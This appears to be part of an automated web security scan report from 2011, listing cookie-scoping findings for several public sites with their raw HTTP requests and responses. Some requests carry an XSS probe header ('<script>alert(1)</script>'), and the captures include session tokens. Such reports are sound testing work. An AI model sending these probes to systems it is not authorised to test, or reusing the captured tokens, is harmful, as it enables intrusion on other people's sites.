Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:32:53 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=WXEJ2N3KRNFIDB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579474; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=609658d5a1ebcf5618d05b23302f38b7; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...

16.3. http://www.greenhulk.net/forums/archive/index.php/t-126285.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.greenhulk.net
Path:   /forums/archive/index.php/t-126285.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/archive/index.php/t-126285.html HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:03:16 GMT
Server: Apache
Set-Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; path=/; domain=.greenhulk.net; HttpOnly
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:03:16 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:03:16 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step&s=95336a5715caddfe645c46b8976e18eb
Expires: Mon, 02 May 2011 02:03:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 0


16.4. http://www.mylearningplan.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mylearningplan.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylearningplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 492
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=%7BB37083AE%2D04D4%2D461A%2DB2D9%2D387A5E72C198%7D; domain=.mylearningplan.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:09 GMT

<div id='section_D'>
           <h1><b>Error Message</b></h1>
<div class='alert'>
<p></p>
<p></p>
<p align='center'><strong>Error: An Error Has occurred on this page</strong></p>
<p></p>
<p align='cent
...[SNIP]...

16.5. http://www.ptcb.org/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ptcb.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ptcb.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 01 May 2011 23:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=4880537;domain=.ptcb.org;expires=Tue, 23-Apr-2041 23:55:51 GMT;path=/
Set-Cookie: CFTOKEN=39658861;domain=.ptcb.org;expires=Tue, 23-Apr-2041 23:55:51 GMT;path=/
location: https://www.ptcb.org//AM/Template.cfm?Section=Home1&WebsiteKey=9d90bd98-be45-4b90-ae8c-25ab71fa0923
Content-Type: text/html; charset=UTF-8

<!-- Source Code Copyright .. 2005 by Advanced Solutions International, Inc. -->

16.6. http://www.washingtonpost.com/wl/jobs/home

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...

16.7. http://0.r.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?ld=4v-pZZqp5PXPxPr2jYxibkwwnB-22O5wIuL9Rzhh78fqUZESO-SNAN1I0p1RZh9VzMKmHl3T_uqiCOJ5FNzwIPuGT5pPBglXL7vsTpG3rmBi8JPX-kGW7cmavEn8vLA8ZUpDfgXYfYMzbr2_h_RClpMCw5bbyCsdCJ-ZAvL8O210BJOjVSygfjXf7m9NrUvzuY_8Hk0eCy2RfmsNjjtsHfYlbjsqqMmQfQuSowlRNdr8M1VAlMMdO-vpb2zhIfHpI866llWxAmY3M9V1EGQfR9Js8RDB7fndDI9tUiQv3sCRfiAXJX94SMuOw HTTP/1.1
Host: 0.r.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; countrycode=US; zipcode=75207; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://clk.atdmt.com/CNT/go/319741851/direct/01/
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSAnalytics=4vfdfecb2d4c0fa370b4247c7f5ca890fe255a7ff3f2d9c16df515059ba889a2c264247fc67cd3b686d59a9dba96fa20d5fcc7df8948e35cc9d47b74a8b87c97eb3554094c90fb1ce99e4b9ec8be3846abbf8e7ed010; expires=Wed, 15 Jun 2011 23:32:50 GMT; domain=.r.msn.com; path=/; httponly
Date: Sun, 01 May 2011 23:32:50 GMT
Connection: close
Content-Length: 191

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://clk.atdmt.com/CNT/go/319741851/direct/01/">here</A>
</BODY>
</HTML>

16.8. http://a.triggit.com/px

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.triggit.com
Path:   /px

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /px?cb=s7l8ya&i=CAEQAiiybjINamFwYW5hdG9yLmNvbUABShhUYjRQT3dBQkt5VUsyaUpMSU1sNHlnPT1Qu5747QRd4XoEQGAAcg8xNzMuMTkzLjIxNC4yNDN4AIABvhmKARUvZWxlcGhhbnQvbG9naW4ucGh0bWw=&gwp=Tb4POwABKyUK2iJLIMl4yvxpGNYmaYG7q1B5DA HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trgu=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Set-Cookie: trgs=382922425; domain=.triggit.com; path=/;
Location: http://tag.admeld.com/match?admeld_adprovider_id=310&external_user_id=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=ogo3ps
Date: Mon, 02 May 2011 02:00:25 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting

16.9. http://ab-m.d.chango.com/m/ab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ab-m.d.chango.com
Path:   /m/ab

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/ab HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ab-m.d.chango.com

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://ads.adbrite.com/adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=3728e74c-7461-11e0-9185-00259009a9e4; Domain=chango.com; expires=Thu, 29 Apr 2021 02:09:30 GMT; Path=/
Connection: close


16.10. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.turn.com
Cookie: uid=3207951335209607633; rrs=undefined%7C2%7C3%7Cundefined%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004; rds=undefined%7C15013%7C15013%7Cundefined%7Cundefined%7C15013%7C15013%7C15013%7C15013%7C15013%7C15013%7C15013%7Cundefined%7C15013; rv=1; pf=_90PbWHCfHQmA1ivIIw5G4EMKdh5ityF6sgfR1rZxdwyIhcl0EGWggtbGC91oY8VKc-gdz7WzBmsN9YXs4uSIOzqBFjueX7aZwnvRhcSBs3iaWve_wv63PKco4w-BWK9o8OpL6FMs5ncMADcj7HCCZOL681iuOj2kWoOE2k1qPBfidfcs42JZlIwUalAHVDrgEz_nvLc-cdbQ5JtcKrDVQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3207951335209607633; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:09:28 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:09:28 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3207951335209607633&rnd=6934683957726833621&fpid=7&nu=n&t=
...[SNIP]...

16.11. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:10:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:10:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:10:32 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

16.12. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:56:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:56:59 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLFRr%2FA0oVdMNFlAJuP69ttfJZOaEQ0F%2FwtuVvMYxQQ%2FDPHdTkOZgDDTtlZGlSCpFZPyUl%2FdsGHGrIgRd8y11OhIrxkYkckQ3sVte%2Bcmt1WKYqV1K%2B%2FA3HuVOvxoIsMZ7F5f%2FEK7rCw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:56:59 GMT
Set-Cookie: vsd=0@1@4dbe0f6b@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 01:56:59 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.13. http://ads.adbrite.com/adserver/behavioral-data/8204

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8204

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/behavioral-data/8204?d=1000,2,3,4,500,93 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=ChQKBjY4Mjg2NRjdreS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx%7Clkjq00"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3ATc1LCoAgFEDRvbyxAz9B0G6MjNTSyn6i7j3LBk0PF26Ag0ITQAt%2F2rVz0IDTbJsjWcahvyKJOFaTxRg5RWv2Z9LvNrOU5mNfWOmn5rTjhUXhHAOClhsjVvmOIKUb"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:39:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3Abc9BDoMgEAXQu8zaBWDRxNtQhYrUoRW1NeLdK8UmJHX7%2Fp%2BfzAozg2oFI5eXHRoHFTiTjw9Pn%2FdWvT31xF96S0jmOlbmKVM12Z21xoOXyJ3Z23WL3DA%2B3kKkpyJEP9Q8RSdYI%2BKAjANh9qgqe3Kv%2BjPEfyzKOkHI4CoQ5aC%2Fb8K2fQA%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:39:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.14. http://ads.adbrite.com/adserver/vdi/682865

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=ChQKBjY4Mjg2NRi5teS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx%7Clkjq01"; 